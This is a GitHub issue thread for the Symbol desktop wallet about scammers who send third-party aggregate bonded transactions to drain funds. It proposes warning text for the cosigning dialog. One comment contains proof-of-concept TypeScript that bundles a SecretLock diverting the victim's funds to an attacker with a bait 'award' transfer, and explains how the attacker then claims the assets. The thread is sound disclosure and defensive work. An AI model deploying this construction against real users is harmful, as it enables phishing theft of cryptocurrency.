Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Additional warning for aggregate bonded announced by "third party" address #1719

Closed
cryptoBeliever opened this issue Sep 29, 2021 · 4 comments · Fixed by #1723
Closed

Additional warning for aggregate bonded announced by "third party" address #1719

cryptoBeliever opened this issue Sep 29, 2021 · 4 comments · Fixed by #1723
Labels
P1 Issue Breaking issue effecting large number of users, Security issue, Risk to users funds Sprint 4

Comments

@cryptoBeliever
Copy link
Contributor

cryptoBeliever commented Sep 29, 2021
edited
Loading

Reason:

Scammers are sending aggregate bonded requesting all funds to random addresses (transaction is initialized from a "third-party" wallet). For example:
http://explorer.symbolblockchain.io/transactions/7BE1EB498B914BDA7F17C26789711E62276280F6322A8C3F36A9E60CD878C9B6

We should add a warning (after pop up with password) - double confirmation - to ask the user if he really wants to send this transaction because it was initialized by the third-party wallet.

We should warn if account which initialized tx is not related to an account that is signing (we should not warn if another cosigner from the same multi- initialized the transaction).

There are some legit bonded initialized by "third-party" accounts like those send by All nodes or nember.art and in future we should maybe do some "whitelist" of addresses.
@cryptoBeliever cryptoBeliever added the P1 Issue Breaking issue effecting large number of users, Security issue, Risk to users funds label Sep 29, 2021
@cryptoBeliever cryptoBeliever changed the title Additional warning for aggregate bonded announced by "third party" wallet Additional warning for aggregate bonded announced by "third party" address Sep 29, 2021
@coiki
Copy link

coiki commented Sep 29, 2021

Affected user: https://twitter.com/gehari3sei/status/1442883477485936651

Affected user: https://twitter.com/Yiddish816/status/1443084024872800256

@coiki coiki added the Sprint 4 label Sep 29, 2021
@segfaultxavi
Copy link
Contributor

Suggested text:

You are about to sign a transaction which was not created by you. Please review the details CAREFULLY.

⚠️ Do not sign if you do not know the origin of the transaction ⚠️

Do you want to proceed?

@hanatyan128
Copy link

hanatyan128 commented Sep 29, 2021
edited
Loading

Related issue here:
An exploit of secret lock exists that can be used by phishing fraud.

POC code

    const aggregateTx = AggregateTransaction.createBonded(
        Deadline.create(epochAdjustment),
        [
            // Tx 1 - Steal the money
            SecretLockTransaction.create(
                Deadline.create(epochAdjustment),
                new Mosaic(networkCurrencyMosaicId, UInt64.fromNumericString('10000000000')),
                UInt64.fromUint(24 * 3600 / 60),
                LockHashAlgorithm.Op_Sha3_256,
                secret,
                attacker.address,
                networkType,
            ).toAggregate(victim),
            // Tx 2 - Bait
            TransferTransaction.create(
                Deadline.create(epochAdjustment),
                victim.address,
                [
                    new Mosaic(
                        networkCurrencyMosaicId,
                        UInt64.fromNumericString('500000000')
                    )
                ],
                PlainMessage.create('Congratulations! You got award!'),
                networkType,
            ).toAggregate(attacker.publicAccount)
        ],
        networkType,
        [],
        UInt64.fromNumericString('1000000'));

The victim will get a partial transaction below

exploit_secret_lock

http://explorer.testnet.symboldev.network/transactions/98A58EAC33362021CDBAB5D61699BA3918127287037DA5629E8FD2815E7DAF12

Once the victim has signed the partial transaction, The attacker announce the proof and grab victim's assets.

@yilmazbahadir yilmazbahadir mentioned this issue Sep 29, 2021
Merged
@yilmazbahadir yilmazbahadir mentioned this issue Sep 29, 2021
Merged
@cryptoBeliever cryptoBeliever mentioned this issue Sep 30, 2021
Closed
@cryptoBeliever
Copy link
Contributor Author

@hanatyan128 showing secret lock will be done in separate issue.

@wlexiiii wlexiiii mentioned this issue Oct 21, 2022
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
P1 Issue Breaking issue effecting large number of users, Security issue, Risk to users funds Sprint 4
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

fix: showing a warning on transactions detail/cosignature modal symbol/desktop-wallet
4 participants
@coiki @segfaultxavi @cryptoBeliever @hanatyan128